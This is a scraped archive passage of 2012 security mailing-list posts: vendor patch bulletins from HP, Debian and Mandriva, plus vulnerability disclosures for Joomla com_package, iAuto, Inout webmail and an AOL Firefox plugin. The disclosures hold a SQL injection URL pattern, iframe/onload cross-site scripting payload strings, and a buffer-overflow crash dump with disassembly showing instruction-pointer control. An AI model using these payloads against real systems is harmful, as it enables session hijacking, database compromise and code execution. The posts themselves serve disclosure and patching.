mes5/i586/openoffice.org-help-bs-3.1.1-0.10mdvmes5.2.i586.rpm 3b198933a2912fcf2d9ef0fde49d574a mes5/i586/openoffice.org-help-ca-3.1.1-0.10mdvmes5.2.i586.rpm 186930b4688fe0a64e7725771892233f mes5/i586/openoffice.org-help-cs-3.1.1-0.10mdvmes5.2.i586.rpm 1f45ff223f2e45395a60276fe7563f12 mes5/i586/openoffice.org-help-cy-3.1.1-0.10mdvmes5.2.i586.rpm 19b98f25267e4bf49ddc01fb306071cf mes5/i586/openoffice.org-help-da-3.1.1-0.10mdvmes5.2.i586.rpm 891f89472adec36d16aa9fc5ed5aae6a mes5/i586/openoffice.org-help-de-3.1.1-0.10mdvmes5.2.i586.rpm c24be94f5529534c7ace28e699779b04 mes5/i586/openoffice.org-help-el-3.1.1-0.10mdvmes5.2.i586.rpm eacb56be43643d9ee715f65fac9218a0 mes5/i586/openoffice.org-help-en_GB-3.1.1-0.10mdvmes5.2.i586.rpm 838b9d70709dbeedc464d9ccea7fd3cb mes5/i586/openoffice.org-help-en_US-3.1.1-0.10mdvmes5.2.i586.rpm 403b3ec73a39aa358df9d60102b7b49a mes5/i586/openoffice.org-help-es-3.1.1-0.10mdvmes5.2.i586.rpm 0d50be2720e9f109c330820f8f0a80b4 mes5/i586/openoffice.org-help-et-3.1.1-0.10mdvmes5.2.i586.rpm 18cb8f30c072f50b62f22adac13fc672 mes5/i586/openoffice.org-help-eu-3.1.1-0.10mdvmes5.2.i586.rpm 585250c218bf136047b8902997655842 mes5/i586/openoffice.org-help-fi-3.1.1-0.10mdvmes5.2.i586.rpm 9fc6079ff2dd3073c1f381d2fdbb73e0 mes5/i586/openoffice.org-help-fr-3.1.1-0.10mdvmes5.2.i586.rpm ed3e0f5f396808c1be384f5f2240bdd9 mes5/i586/openoffice.org-help-he-3.1.1-0.10mdvmes5.2.i586.rpm b520a65914053d6a8f6efc13b44218e7 mes5/i586/openoffice.org-help-hi-3.1.1-0.10mdvmes5.2.i586.rpm 40924742691106787ae51750ed8bab89 mes5/i586/openoffice.org-help-hu-3.1.1-0.10mdvmes5.2.i586.rpm 9d11f926bf0cced2a87f292558200b4a mes5/i586/openoffice.org-help-it-3.1.1-0.10mdvmes5.2.i586.rpm d9575ebf23f93aac0fbdc7597e9c1379 mes5/i586/openoffice.org-help-ja-3.1.1-0.10mdvmes5.2.i586.rpm 6a00568b59cb94db7252c3eb2dc90cf4 mes5/i586/openoffice.org-help-ko-3.1.1-0.10mdvmes5.2.i586.rpm c1147d7599126090b93e4e6dc6b0ec6f mes5/i586/openoffice.org-help-mk-3.1.1-0.10mdvmes5.2.i586.rpm 86ed7c005fbf01473bc71bbbfb3e481b mes5/i586/openoffice.org-help-nb-3.1.1-0.10mdvmes5.2.i586.rpm 4ecd81f98a4d31ff97a106828f2e9f22 mes5/i586/openoffice.org-help-nl-3.1.1-0.10mdvmes5.2.i586.rpm c49ce10827d4766708f1e7a5e61ebba9 mes5/i586/openoffice.org-help-nn-3.1.1-0.10mdvmes5.2.i586.rpm 50b3e0131942a99ff6f89e7f519a122e
[security bulletin] HPSBMU02798 SSRT100908 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03405705 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03405705 Version: 1 HPSBMU02798 SSRT100908 rev.1 - HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Cross Site Scripting (XSS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-08-02 Last Updated: 2012-08-02 Potential Security Impact: Remote cross site scripting (XSS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Network Node Manager i (NNMi) for HP-UX, Linux, Solaris, and Windows. The vulnerabilities could be remotely exploited resulting in cross site scripting (XSS). References: CVE-2012-2022 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Network Node Manager I (NNMi) v8.x, v9.0x, v9.1x, v9.20 for HP-UX, Linux, Solaris, and Windows BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-2022(AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made hotfixes available to resolve these vulnerabilities for NNMi v9.0x, v9.1x, and v9.20. The hotfixes can be obtained by contacting the normal HP Services support channel. Customers should open a support case to request the following hotfixes. Customers using NNMi v8.x should upgrade to v9.0x, v9.1x, or 9.20 and apply the required patch and the hotfix. For NNMi v9.0x and v9.1x NNMi Version Required Patch Hotfix 9.0x Patch 5 Hotfix-NNMi-9.0xP5-UI-Security-20120801 9.1x Patch 3 or 4 Hotfix-NNMi-9.1xP4-UI-Security-20120801 9.20 no patch required Hotfix-NNMi-9.20-NmsAsShared-20120801 Note: The hotfix must be installed after the required patch. The hotfix must be reinstalled if the required patch is reinstalled. For NNMi v8.x Upgrade to v9.0x, v9.1x, or v9.20 and apply the required patch and the hotfix listed in the table above. MANUAL ACTIONS: Yes - Update Install the applicable patch and hotfix. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS For HP-UX NNMi v9.0x HP-UX B.11.31 HP-UX B.11.23 (IA) = HPOvNNM.HPOVNNMUI action: install Hotfix-NNMi-9.0xP5-UI-Security-20120801 For HP-UX NNMi v9.1x HP-UX B.11.31 HP-UX B.11.23 (IA) = HPOvNNM.HPOVNNMUI action: install Hotfix-NNMi-9.1xP4-UI-Security-20120801 For HP-UX NNMi v9.20 HP-UX B.11.31 HP-UX B.11.23 (IA) = HPOvNNM.HPOVNMSASSHARED action: install Hotfix-NNMi-9.20-NmsAsShared-20120801 For HP-UX NNMi v8.x HP-UX B.11.31 HP-UX B.11.23 (IA) = HPOvNNM.HPOVNNMUI action: upgrade to v9.0x or v9.1x and apply the required patch and hotfix END AFFECTED VERSIONS HISTORY Version:1 (rev.1) - 2 August 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI =
Joomla com_package - SQL Injection Vulnerability
Title: == Joomla com_package - SQL Injection Vulnerability Date: = 2012-07-08 References: === http://www.vulnerability-lab.com/get_content.php?id=652 VL-ID: = 652 Common Vulnerability Scoring System: 8.3 Introduction: = Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla) Abstract: = A Vulnerability-Lab researcher discovered a SQL injection vulnerability in the com_package module of the joomla CMS. Report-Timeline: 2012-07-08: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: A SQL Injection vulnerability is detected in the com_package module of the joomla Content Management System. Remote attackers low privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the com_package module with the bound vulnerable id parameter. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Vulnerable Module(s): [+] index.php?option=com_package Vulnerable Parameter(s): [+] id Proof of Concept: = The SQL Injection vulnerabilities can be exploited by remote attackers without privileged user account or required user inter action. For demonstration or reproduce ... PoC: Path: / File: index.php Module: ?option=com_package Parameter: detailsid=-1'[SQL Injection]-- URL: http://www.xxx.com/index.php?option=com_packagetask=detailsid=174-1'[SQL Injection]-- Risk: = The security risk of the remote SQL Injection vulnerability is estimated as critical. Credits: Vulnerability Research Laboratory - Chokri Ben Achor (meis...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission.
[SECURITY] [DSA 2522-1] fckeditor security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2522-1 secur...@debian.org http://www.debian.org/security/ Yves-Alexis Perez August 05, 2012http://www.debian.org/security/faq - - Package: fckeditor Vulnerability : cross site scripting Problem type : remote Debian-specific: no CVE ID : CVE-2012-4000 Debian Bug : 683418 Emilio Pinna discovered a cross site scripting vulnerability in the spellchecker.php page of FCKeditor, a popular html/text editor for the web. For the stable distribution (squeeze), this problem has been fixed in version 1:2.6.6-1squeeze1. For the testing distribution (wheezy), this problem has been fixed in version 1:2.6.6-3. For the unstable distribution (sid), this problem has been fixed in version 1:2.6.6-3. We recommend that you upgrade your fckeditor packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJQH37dAAoJEDBVD3hx7wuovjQP/0aoCME4eFFseyirINsdsaqV Binmmhsl5sY2G48EiMyEq3RH0eSg2Pip3MA6JJCErdhYvAA4FGEIM3jiSymEIyxE avnKrbVxR1xH8cFJXVyMdu7za6dBFydW6ZUAT7P5+hPVoaGwQ3R4EwSVBlNV5PHr CQCr6pG/mICUiYyAWC23VeL6PHO7hIS5Evi33DW6wOQg/NB8ERsACt8NIirFSAAB gbPg6ny7x+mioxxGrUzh7XZe7aRYjjk0CFdmgmcpMjEB7h++6qwGlbWLhPt3ddeC Iwmui85FHIgINTqRIuPszpub5IBkn7A3qUiMl6yzd/Igdjlb5oJt40C6mQ2nrXMj DBo5AGxq/Xv3QXyFrpuIXcS7G1hlpef7c0ofFAkNCKKMQllYhqdLUp6kTB+6yWCx aPjtRnnvn3co6zkNpmWnCh2DQ65taY3CDxdymfEOTeAZEvFv5R9Ge+Q0jQO+6xLV teGnZIHf1znOFj3nfUKTOyI+s6FWXFsaYaYnsXuQnZzBlc8opM2IILYd/MQqIiH+ zMaosJraYlP8Om8XGd2NUFmigYzi6x3klwWsbRHaowgC9OxL1AlAZDs9maLu+Q2C aSqhUd3xd5dikc1Eu23kdetKotjpyj4LzMP3gAdcIUtqd/N1vrMT8Cj3tSdueJwO 1kY5sLaI9j1nsx8QPftT =rOo8 -END PGP SIGNATURE-
[SECURITY] [DSA 2519-2] isc-dhcp regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2519-2 secur...@debian.org http://www.debian.org/security/Nico Golde August 4, 2012 http://www.debian.org/security/faq - - Package: isc-dhcp Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2011-4539 CVE-2012-3571 CVE-2012-3954 It was discovered that the recent update for isc-dhcp, did not contain the patched code included in the source package. Due to quirk in the build system those patches were deapplied during the build process. For the stable distribution (squeeze), this problem has been fixed in version 4.1.1-P1-15+squeeze6. We recommend that you upgrade your isc-dhcp packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlAdAyMACgkQHYflSXNkfP9wCgCcCk6v59916GKjY223a7RNwQOG MZsAn34XoNM9uVGwskuO+Yx3CEya1kvO =+/cw -END PGP SIGNATURE-
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution
AOL Products downloadUpdater2 Plugin SRC Parameter Remote Code Execution tested against: Microsoft Windows Vista sp2 Microsoft Windows Server 2003 r2 sp2 Mozilla Firefox 14.0.1 download url: http://client.web.aol.com/toolbarfiles/Prod/downloads/downloadupdater/dnupdatersetup.exe (this was the update for a previous vulnerability, see ZDI-12-098) see also the installer aol_toolbar_pricecheck.exe url: http://toolbar.aol.com/download_files/download-helper.html?brand=aola=111ncid=txtlnkusdown0043 vulnerability: the mentioned product installs a Firefox plugin: File: npdnupdater2.dll Version: 1.3.0.0 Name: npdnupdater2 Path: C:\Program Files\Mozilla Firefox\plugins\npdnupdater2.dll Mime type: applicatiotn/x-vend.aol.dnupdater2.1 Extension: ocp By embedding this plugin inside an html page is possible to trigger a buffer overflow vulnerability through the 'SRC' parameter. Example crash: EAX ECX 01101470 EDX 01135208 ASCII EBX ESP 0013F618 EBP 0013F634 ESI 0002 EDI 0013F668 EIP 61616161 C 1 ES 0023 32bit 0() P 1 CS 001B 32bit 0() A 1 SS 0023 32bit 0() Z 0 DS 0023 32bit 0() S 1 FS 003B 32bit 7FFDD000(4000) T 0 GS NULL D 0 O 0 LastErr ERROR_SUCCESS EFL 0297 (NO,B,NE,BE,S,PE,L,LE) ST0 empty 0.0 ST1 empty 0.0 ST2 empty 0.0 ST3 empty 0.0 ST4 empty 0.0 ST5 empty 0.0 ST6 empty 8.000 ST7 empty 0.250 CONST 1/4. 3 2 1 0 E S P U O Z D I FST 0120 Cond 0 0 0 1 Err 0 0 1 0 0 0 0 0 (LT) FCW 027F Prec NEAR,53 Mask1 1 1 1 1 1 Last cmnd 001B:10571FBD xul.10571FBD XMM0 XMM1 61616161 61616161 61616161 61616161 XMM2 61616161 61616161 61616161 61616161 XMM3 61616161 61616161 61616161 61616161 XMM4 61616161 61616161 61616161 61616161 XMM5 61616161 61616161 61616161 61616161 XMM6 61616161 61616161 61616161 61616161 XMM7 61616161 61616161 61616161 61616161 P U O Z D I MXCSR 1F80 FZ 0 DZ 0 Err 0 0 0 0 0 0 Rnd NEAR Mask 1 1 1 1 1 1 EIP is overwritten, also EDX points to user-supplied code (this can be done by setting an overlong fake parameter, see poc). As attachment, proof of concept code. a copy loop [*] is involved in overwriting a certain memory region. The subsequent code can be used to call inside this memory region [**]. See npdnupdater2.dll: CPU Disasm Address Hex dump Command Comments 01A91C10 /$ 55PUSH EBP ; npdnupdater2.01A91C10(guessed Arg1) 01A91C11 |. 56PUSH ESI 01A91C12 |. 8BE9 MOV EBP,ECX 01A91C14 |. 57PUSH EDI 01A91C15 |. 8B7C24 10 MOV EDI,DWORD PTR SS:[ARG.1] 01A91C19 |. C745 00 9CA2A MOV DWORD PTR SS:[EBP],OFFSET 01A9A29C 01A91C20 |. 8B07 MOV EAX,DWORD PTR DS:[EDI] 01A91C22 |. 33F6 XOR ESI,ESI 01A91C24 |. 8945 04 MOV DWORD PTR SS:[EBP+4],EAX 01A91C27 |. C645 08 00MOV BYTE PTR SS:[EBP+8],0 01A91C2B |. C745 10 0 MOV DWORD PTR SS:[EBP+10],0 01A91C32 |. 66:3977 0ACMP WORD PTR DS:[EDI+0A],SI 01A91C36 |. 7E 3E JLE SHORT 01A91C76 01A91C38 |. EB 06 JMP SHORT 01A91C40 01A91C3A | 8D9B LEA EBX,[EBX] 01A91C40 | 8B4F 0C /MOV ECX,DWORD PTR DS:[EDI+0C] 01A91C43 |. 8B14B1|MOV EDX,DWORD PTR DS:[ESI*4+ECX] 01A91C46 |. 68 D4A2A901 |PUSH OFFSET 01A9A2D4; /Arg2 = ASCII SRC 01A91C4B |. 52|PUSH EDX; |Arg1 01A91C4C |. E8 E06F |CALL 01A98C31- ; \npdnupdater2.01A98C31 01A91C51 |. 83C4 08 |ADD ESP,8 01A91C54 |. 85C0 |TEST EAX,EAX 01A91C56 |. 75 15 |JNE SHORT 01A91C6D 01A91C58 |. 8B47 10 |MOV EAX,DWORD PTR DS:[EDI+10] 01A91C5B |. 8B0CB0|MOV ECX,DWORD PTR DS:[ESI*4+EAX] 01A91C5E |. BA 38CCA901 |MOV EDX,OFFSET 01A9CC38 ; ASCII ... 01A91C63 | 8A01 |/MOV AL,BYTE PTR DS:[ECX] - [*] 01A91C65 |. 41||INC ECX 01A91C66 |. 8802 ||MOV BYTE PTR DS:[EDX],AL 01A91C68 |. 42||INC EDX 01A91C69 |. 84C0 ||TEST AL,AL 01A91C6B |.^ 75 F6 |\JNE SHORT 01A91C63 01A91C6D | 0FBF4F 0A |MOVSX ECX,WORD PTR DS:[EDI+0A] 01A91C71 |. 46|INC ESI 01A91C72 |. 3BF1 |CMP ESI,ECX 01A91C74 |.^ 7C CA \JL SHORT 01A91C40 01A91C76 | 5FPOP EDI 01A91C77 |. 5EPOP ESI 01A91C78 |. 8BC5 MOV EAX,EBP 01A91C7A |. 5DPOP EBP 01A91C7B \. C2 0400 RETN 4 01A91C7E CCINT3
iAuto Mobile Application 2012 - Multiple Web Vulnerabilities
Title: == iAuto Mobile Application 2012 - Multiple Web Vulnerabilities Date: = 2012-07-11 References: === http://www.vulnerability-lab.com/get_content.php?id=658 VL-ID: = 658 Common Vulnerability Scoring System: 3.5 Introduction: = With Internet on mobile devices booming, having a desktop-oriented version is just not enough anymore. Empower your visitors with content designed for mobile Web by offering them a mobile version of your classifieds website. WorksForWeb is offering custom-made mobile frontend addons for our classified solutions. The mobile version of your website will present all the data of the regular website in the format optimized for iPhone, Android, iPad, BlackBerry, Symbian, or other mobile devices. Mobile frontend addon features: Quick and advanced search, Browsing, Tabbed design, Multi-language interface, Google Maps, And much more Addon is seamlessly integrated with your main website. Your website automatically detects mobile browsers to redirect mobile visitors to the mobile-optimized content. Why do you need a mobile gateway to your website? Because all the market leaders have mobile access, and so should you. The mobile technology is redefining our future, and you should be one step ahead of your smaller competitors. Mobile users now make up a large percentage of your target audience, and their needs to access information easily are important to address. At this moment, the mobile addon is compatible with classified solutions of v.5.2 and above. The price of the mobile frontend addon is only $175. This price includes a free expert installation on your server. (Copy of the Vendor Homepage: http://www.worksforweb.com/classifieds-software/addons/mobile-addon/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple cross site vulnerabilities in the iAuto Mobile APP for Android, iOS Blackberry. Report-Timeline: 2012-07-10: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: 1.1 A persistent input validation vulnerability is detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson Blackberry. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerability is located in comments module with the bound vulnerable commentSid parameter. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged user account. Vulnerable Module(s): [+] Comments Reply to The Comment Listing Vulnerable Parameter(s): [+] commentSid commentInfo 1.2 Multiple non persistent cross site scripting vulnerabilities are detected in the iAuto Mobile APP for Android, iOS (iPhone), Ericsson Blackberry. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The bugs are located in the Dealer Search Sellers or Browse by Make and Model with the bound vulnerable parameters city path/url. Successful exploitation can result in account steal, client side phishing client-side content request manipulation. Exploitation requires medium or high user inter action without privileged web application user account. Vulnerable Module(s): [+] Dealer Search Sellers City [+] Browse by Make and Model /../ Vulnerable Parameter(s): [+] City [+] Folder Access Listing Proof of Concept: = 1.1 The persistent vulnerabilities can be exploited by remote attackers with low privileged user account and with low required user inter action. For demonstration or reproduce ... Review: Add Comments - Listing div class=addComment h1Reply to The Comment/h1 div class=pageDescription div class=commentInfoYou are replying to the comment #iframe src=iAuto%20%20%20Listing%20Comments%20Reply%20to%20The%20Comment-Dateien/[PERSISTENT INJECTED CODE!])' = to= listing= #448= span= class=fieldValue fieldValueYear height=900 width=10002007/span span class=fieldValue fieldValueMakeAcura/span 1.2 The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or highr equired user inter action. Fo demonstration or reproduce ... String: iframe src=http://vuln-lab.com width=1000 height=900 onload=alert(VulnerabilityLab) Dealer Search Sellers City PoC:
Inout Mobile Webmail APP - Multiple Web Vulnerabilities
Title: == Inout Mobile Webmail APP - Multiple Web Vulnerabilities Date: = 2012-06-08 References: === http://www.vulnerability-lab.com/get_content.php?id=609 VL-ID: = 609 Common Vulnerability Scoring System: 3.5 Abstract: = The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the inoutscripts mobile Inoutmail Webmail CMS 2012. Report-Timeline: 2012-06-08: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the inoutscripts mobile Inoutmail CMS 2012. The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action privileged user account. The persistent valiation vulnerabilities are located in the new mail contacts modules with the bound values to, bcc, cc. The bug can be exploited by remote attackers. The attacker is sending a malicious mail with vulnerable script code values as content. The admin or customer is watching the arriving mail and the persistent script code in To or Bcc inputs. The context will be executed (persistent) when the user,customer or admin is processing to check his mails. A privileged user account can also use the bug to save it persistent for higher privileged user account exploitation. Vulnerable Module(s): [+] New Mail [+] Contacts Vulnerable Parameter(s): [+] To [+] Cc [+] Bcc Proof of Concept: = The persistent vulnerabilities can be exploited by remote attackers with low required user inter action. For demonstration or reproduce ... Insert the demonstration string to the Bcc, Cc To of the send new mail. Secound possibility is to send a mail from outside to the inout webmail with the string code values. PoC: iframe src=http://vuln-lab.com onload=alert(VL) Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium(+). Credits: Vulnerability Laboratory [Research Team] -snup (s...@vulnerability-lab.com [http://snup1.blogspot.com] Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
[ MDVSA-2012:125 ] wireshark
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:125 http://www.mandriva.com/security/ ___ Package : wireshark Date: August 6, 2012 Affected: 2011., Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities was found and corrected in Wireshark: It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file (CVE-2012-4048). It may be possible to make Wireshark consume excessive CPU resources by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file (CVE-2012-4049). This advisory provides the latest versiona of Wireshark (1.4.14, 1.6.8) which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4048 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4049 http://www.wireshark.org/security/wnpa-sec-2012-11.html http://www.wireshark.org/security/wnpa-sec-2012-12.html ___ Updated Packages: Mandriva Linux 2011: f3ffccbd9181351dae1d2c0b758cbf37 2011/i586/dumpcap-1.6.9-0.1-mdv2011.0.i586.rpm 2e4f9f20e5700174f5fca72fe971e7f4 2011/i586/libwireshark1-1.6.9-0.1-mdv2011.0.i586.rpm 4cfcdf10019b8acd1c31463bdd197e23 2011/i586/libwireshark-devel-1.6.9-0.1-mdv2011.0.i586.rpm 07fcde7006fe2e37a5750f9315ec3d2c 2011/i586/rawshark-1.6.9-0.1-mdv2011.0.i586.rpm 959a554376c637f102c9554857f8e6d8 2011/i586/tshark-1.6.9-0.1-mdv2011.0.i586.rpm 3268efef55ceeec0c7bd92fa6cc88aff 2011/i586/wireshark-1.6.9-0.1-mdv2011.0.i586.rpm bab97929a14abe2ad00304666ec8b245 2011/i586/wireshark-tools-1.6.9-0.1-mdv2011.0.i586.rpm 1030bf8c8d4d1cbcc94311783ef024ed 2011/SRPMS/wireshark-1.6.9-0.1.src.rpm Mandriva Linux 2011/X86_64: 55643125eac0aa52d7aefc3c79865aca 2011/x86_64/dumpcap-1.6.9-0.1-mdv2011.0.x86_64.rpm de6d050196f470c2957b7f029f244fa0 2011/x86_64/lib64wireshark1-1.6.9-0.1-mdv2011.0.x86_64.rpm 7a118e7b1246e012925f82089a3a 2011/x86_64/lib64wireshark-devel-1.6.9-0.1-mdv2011.0.x86_64.rpm 8a1e82c5eeb39601b4bc1a84b2e7b3dc 2011/x86_64/rawshark-1.6.9-0.1-mdv2011.0.x86_64.rpm ecf48e205ae56a633ebba9aee42c2652 2011/x86_64/tshark-1.6.9-0.1-mdv2011.0.x86_64.rpm 769dbbba44184f7688d65c7796c9a09a 2011/x86_64/wireshark-1.6.9-0.1-mdv2011.0.x86_64.rpm 874c594675dd32c845b4ca2f7906ebf6 2011/x86_64/wireshark-tools-1.6.9-0.1-mdv2011.0.x86_64.rpm 1030bf8c8d4d1cbcc94311783ef024ed 2011/SRPMS/wireshark-1.6.9-0.1.src.rpm Mandriva Enterprise Server 5: 16739c56347a27bc2ec7aabb2be8bd0f mes5/i586/dumpcap-1.4.14-0.1mdvmes5.2.i586.rpm 2e2b32f8a0353d40a845305a6d4358a6 mes5/i586/libwireshark0-1.4.14-0.1mdvmes5.2.i586.rpm f45141ca30f2a5e3eab17e2be47db83f mes5/i586/libwireshark-devel-1.4.14-0.1mdvmes5.2.i586.rpm 8687707fa691ecc28820a9530b999e7b mes5/i586/rawshark-1.4.14-0.1mdvmes5.2.i586.rpm 74f48956f17a1d8c2ae979e16266d192 mes5/i586/tshark-1.4.14-0.1mdvmes5.2.i586.rpm d67c8fe15fb4cb1adfe382ec1de560ed mes5/i586/wireshark-1.4.14-0.1mdvmes5.2.i586.rpm b30607a3a748fd366b9b4e0633c9b73e mes5/i586/wireshark-tools-1.4.14-0.1mdvmes5.2.i586.rpm 392f5a6307f5b89f4c76778e55b70ba6 mes5/SRPMS/wireshark-1.4.14-0.1mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 4ebd9a744ae2b266acb47151f99fb5e3 mes5/x86_64/dumpcap-1.4.14-0.1mdvmes5.2.x86_64.rpm 5db432a062c8a779db4b91ca0936afca mes5/x86_64/lib64wireshark0-1.4.14-0.1mdvmes5.2.x86_64.rpm abd972eb433c6953ffde0f729d3db2d4 